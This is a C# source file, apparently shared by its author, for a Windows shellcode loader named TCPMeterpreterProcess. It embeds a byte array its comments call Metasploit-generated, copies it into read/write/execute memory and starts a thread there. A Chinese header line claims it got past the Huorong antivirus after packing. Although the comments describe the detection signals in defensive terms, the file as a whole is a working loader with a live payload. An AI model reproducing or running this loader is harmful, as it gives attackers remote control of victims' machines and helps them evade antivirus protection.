ccccc

未免杀,加壳之后过了火绒

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;

namespace TCPMeterpreterProcess
{
    /// <summary>
    /// Console entry point that stages an embedded byte array into a freshly
    /// allocated read/write/execute region and runs it on a new thread through
    /// kernel32 P/Invoke (the classic "self-injection" shellcode loader shape).
    /// From a defensive standpoint the observable sequence in this file is:
    /// VirtualAlloc(MEM_COMMIT, PAGE_EXECUTE_READWRITE) -> Marshal.Copy ->
    /// CreateThread with a start address inside that private, non-image-backed
    /// region -> WaitForSingleObject(INFINITE). RWX private memory plus a thread
    /// start address outside any loaded module are the signals an EDR or memory
    /// scanner keys on. The byte array itself is opaque here; the only statement
    /// about it is the author's comment that it was generated with Metasploit.
    /// </summary>
    class Program
    {
        /// <summary>
        /// Allocates executable memory, copies the embedded bytes into it and
        /// blocks until the thread started at that address exits.
        /// </summary>
        /// <param name="args">Unused command-line arguments.</param>
        static void Main(string[] args)
        {
            // Opaque position-independent code blob. The author's note says it was
            // generated with Metasploit; it is not decoded or verified on this page.
            byte[] shellcode = new byte[] { 0xdd,0xc1,0xd9,0x74,0x24,0xf4,0x5b,0xb8,0x74,0x2f,0x00,0xb6,0x31,0xc9,0xb1,
0xb8,0x83,0xc3,0x04,0x31,0x43,0x13,0x03,0x37,0x3c,0xe2,0x43,0x6e,0x84,0x3b,
0xdf,0xb4,0xfd,0x01,0xdc,0x06,0x95,0x91,0x42,0x57,0xaf,0xd3,0xcc,0x14,0xc0,
0xe8,0x1e,0x75,0x0b,0x12,0x0e,0x61,0x63,0x89,0x83,0x59,0xc7,0x79,0x95,0x08,
0x5a,0x55,0x18,0x2f,0xf3,0x33,0x86,0xa3,0x1c,0xbb,0xdb,0xef,0xfe,0x6a,0xf7,
0x73,0x60,0x88,0x14,0x2d,0x22,0x1b,0xc3,0x15,0x43,0xfb,0x8d,0xdc,0xd7,0x0e,
0x8c,0x66,0x2d,0xa1,0x6f,0xa4,0x51,0xb9,0x6f,0x75,0x15,0x9b,0x60,0x38,0x3b,
0xb4,0xba,0x50,0xc3,0xbf,0x52,0xb5,0x42,0xe4,0x6e,0xf8,0x0c,0x9f,0xf9,0xd7,
0xa4,0x85,0x15,0x1b,0x63,0xb9,0xf2,0xd2,0x8c,0x1e,0x88,0x6a,0x87,0x6a,0x4a,
0xac,0x00,0x62,0xe4,0x5d,0x0c,0x4b,0x9e,0xd8,0x69,0x6a,0x3f,0xdf,0x02,0x3d,
0xae,0x14,0x6c,0x71,0x25,0x1b,0x95,0xb2,0x73,0x27,0x26,0x17,0x5d,0xd9,0x5f,
0x87,0xa9,0xd6,0xd7,0x05,0xbc,0xef,0xe5,0x15,0x4b,0xf0,0xf8,0x84,0xda,0x5d,
0xed,0x4b,0xcf,0x83,0xe9,0xf0,0x82,0x67,0x2d,0x6e,0xbf,0x5f,0xbf,0x06,0x5a,
0x9c,0x9c,0x3b,0x13,0x0d,0x97,0xb5,0xde,0x5e,0xea,0x02,0xe8,0xd7,0x12,0x57,
0x83,0xee,0x76,0xbc,0x89,0xc0,0xaa,0x44,0x08,0x34,0xce,0xa6,0x97,0xb6,0x7e,
0xe9,0xeb,0x18,0x0f,0x41,0x98,0xff,0x2f,0xa8,0xa7,0x57,0xbe,0x82,0x66,0x38,
0x87,0x38,0x88,0x04,0xc4,0x6a,0x38,0x3c,0xbc,0xda,0xa7,0x0c,0xbf,0xf1,0x04,
0xa3,0x37,0xe7,0x94,0xda,0xde,0x1b,0x98,0x29,0xd5,0x97,0x6c,0x59,0x76,0x73,
0x22,0x48,0xde,0xf4,0xa4,0x4d,0xb3,0xa9,0xe5,0xce,0x3f,0x76,0x29,0x2a,0xc6,
0x5f,0x07,0x34,0xa2,0xce,0x7a,0x5f,0x0d,0x8b,0x43,0x08,0xa8,0x16,0x44,0x98,
0x16,0x11,0x6d,0x1b,0x93,0x6f,0x8f,0xe8,0x34,0x94,0x45,0x82,0x01,0x03,0xae,
0x5a,0x08,0x63,0xa3,0x02,0xf6,0xcb,0x40,0x77,0x84,0x0e,0x52,0x86,0x16,0x45,
0xa4,0xc9,0x28,0x55,0x76,0x80,0x68,0x9f,0xa1,0x15,0xc6,0x02,0x42,0xc1,0x95,
0x57,0xf8,0xe6,0x84,0x6b,0x54,0x9a,0xa2,0xbd,0xac,0x1e,0xf1,0x1b,0x85,0x87,
0x6d,0x32,0x53,0x0c,0x23,0xb4,0xe4,0x02,0xbb,0x2b,0x91,0xc4,0x63,0xd4,0xbc,
0xe9,0x1a,0x69,0x2a,0x1c,0x3e,0x8d,0x9e,0x9a,0xe4,0xc0,0xf5,0xd8,0x25,0xe6,
0x34,0xac,0x84,0x97,0xb1,0x3f,0xb9,0xd6,0xc8,0xbd,0x2e,0x97,0xd2,0x36,0x5c,
0x91,0x4e,0x0b,0xe5,0x7e,0x4b,0x1d,0xca,0x2f,0x53,0xe2,0xdf,0x53,0x8b,0xf4,
0x6a,0x7f,0xd8,0x04,0x1e,0x14,0x59,0xec,0x91,0x20,0x4f,0x25,0x00,0x6b,0xff,
0x4b,0x70,0x3a,0x9a,0xc5,0xeb,0xac,0xf8,0x39,0x8f,0x02,0xc3,0x9f,0x23,0x6a,
0x1a,0x0a,0x47,0x16,0xba,0x33,0x9e,0x2a,0x22,0x98,0xbc,0xee,0x2e,0x14,0xdf,
0xa2,0x6a,0xaa,0x6b,0xc1,0x5c,0xe1,0x41,0xeb,0x71,0x92,0x14,0x17,0x23,0x84,
0x3d,0x34,0xb8,0x29,0xe4,0xea,0x09,0xa5,0xa0,0x97,0x4f,0x03,0x54,0x0b,0x3f,
0x2c,0x06,0x6d,0x16,0xbd,0xdc,0x5b,0xe4,0x80,0x7b,0x1d,0xe2,0xd2,0xb4,0x7a,
0x84,0x9c,0xe9,0x0c,0x2f,0x38,0xeb,0x21,0x1a,0x2e,0xe1,0xbe,0xf1,0x75,0x67,
0xf5,0xe3,0xcb,0x58,0x38,0xfe,0x11,0xd6,0xfd,0x01,0x5d,0x7c,0xb8,0xeb,0xc9,
0x7c,0x23,0xbb,0x9d,0x6f,0xfe,0xda,0x10,0xa0,0xbe,0xd7,0x29,0xb0,0xc5,0xd4,
0xfa,0x95,0xfe,0x0b,0x74,0x63,0x8a,0x5b,0xf5,0xa0,0x2b,0x6e,0xf2,0xb5,0x9b,
0xf3,0x21,0x8f,0xb0,0x7d,0x03,0xf7,0xc2,0xea,0x40,0x99,0x95,0x8a,0xea,0x2c,
0x7b,0x52,0x04,0x37,0x48,0xe9,0x5a,0x8e,0x5c,0x50,0xc5,0xe6,0xe3,0x63,0xcf,
0x7c,0x11,0xf5,0x7c,0xfb,0x3f,0x60,0x6e,0xae,0x4a,0x8e,0x28,0x11,0xf2,0xe8,
0x76,0xde,0xb7,0x15,0x30,0xd7,0x3d,0x3a,0x7f,0xd9,0x46,0x29,0xe4,0x50,0x0e,
0x85,0x3c,0x27,0x60,0x0e,0xd4,0x4d,0x25,0xbf,0xfe,0x49,0xb5,0x1a,0x25,0x3f,
0x7d,0x0d,0xb8,0x7f,0x59,0x3f,0xdf,0xc8,0x76,0x22,0xa1,0x94,0xec,0x88,0x12,
0x57,0x48,0x2e,0xb2,0x4f,0x1c,0x40,0x84,0xd1,0x6c,0x97,0x56,0xb7,0xb6,0xba,
0xe4,0x8f,0xad,0x09,0x13,0x0a,0x4b,0xad,0xa0,0xc8,0xa2,0xe1,0xe8,0x7d,0x5d,
0x09,0xa8,0x37,0x25,0x0b,0xb1,0xb5,0x4c,0x81,0x3f,0x23,0xe0,0x19,0x40,0xed,
0x55,0x5f,0x3d,0x3c,0x64,0x36,0x3a,0xd4,0xb6,0x8a,0xbd,0x0b,0xf0,0xcc,0xaf,
0xd8,0x1a,0x32,0x1d,0x00,0xd1,0x45,0x5d,0x8c,0xc9,0xe0,0xc5,0x47,0xfc,0xc3,
0x90,0x43,0x5b,0xdc,0xb0,0x75,0x4d,0xda,0x89,0x8a,0x4e,0xbb,0x74,0x71,0xc8,
0xe0,0x2a,0xbe,0xca,0xc7,0x5b,0x80,0x3b,0xf7 };

            // Commit a private region exactly the size of the blob with RWX protection.
            // Note that the P/Invoke declarations below marshal the returned address
            // as UInt32 rather than IntPtr.
            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            // Copy the blob into the region. Nothing in this file changes the
            // protection afterwards, so the region remains RWX for its lifetime —
            // the condition memory scanners look for.
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;
            // No argument is handed to the new thread.
            IntPtr pinfo = IntPtr.Zero;
            // Start a thread whose entry point is the VirtualAlloc'd region, i.e. a
            // start address not backed by any module on disk.
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            // 0xFFFFFFFF is INFINITE: the process stays alive as long as that thread runs.
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
        // VirtualAlloc arguments: MEM_COMMIT (0x1000) and PAGE_EXECUTE_READWRITE (0x40).
        // Declared as mutable statics rather than const; they are never reassigned here.
        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
        // kernel32 imports. Main only calls VirtualAlloc, CreateThread and
        // WaitForSingleObject; VirtualFree, CloseHandle, GetModuleHandle,
        // GetProcAddress, LoadLibrary and GetLastError are declared but unused
        // in this file. Several signatures declare pointer-sized values as UInt32.
        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
        UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
        [DllImport("kernel32")]
        private static extern bool VirtualFree(IntPtr lpAddress,
        UInt32 dwSize, UInt32 dwFreeType);
        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(
        UInt32 lpThreadAttributes,
        UInt32 dwStackSize,
        UInt32 lpStartAddress,
        IntPtr param,
        UInt32 dwCreationFlags,
        ref UInt32 lpThreadId
        );
        [DllImport("kernel32")]
        private static extern bool CloseHandle(IntPtr handle);
        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(
        IntPtr hHandle,
        UInt32 dwMilliseconds
        );
        [DllImport("kernel32")]
        private static extern IntPtr GetModuleHandle(
        string moduleName
        );
        [DllImport("kernel32")]
        private static extern UInt32 GetProcAddress(
        IntPtr hModule,
        string procName
        );
        [DllImport("kernel32")]
        private static extern UInt32 LoadLibrary(
        string lpFileName
        );
        [DllImport("kernel32")]
        private static extern UInt32 GetLastError();
    }
}
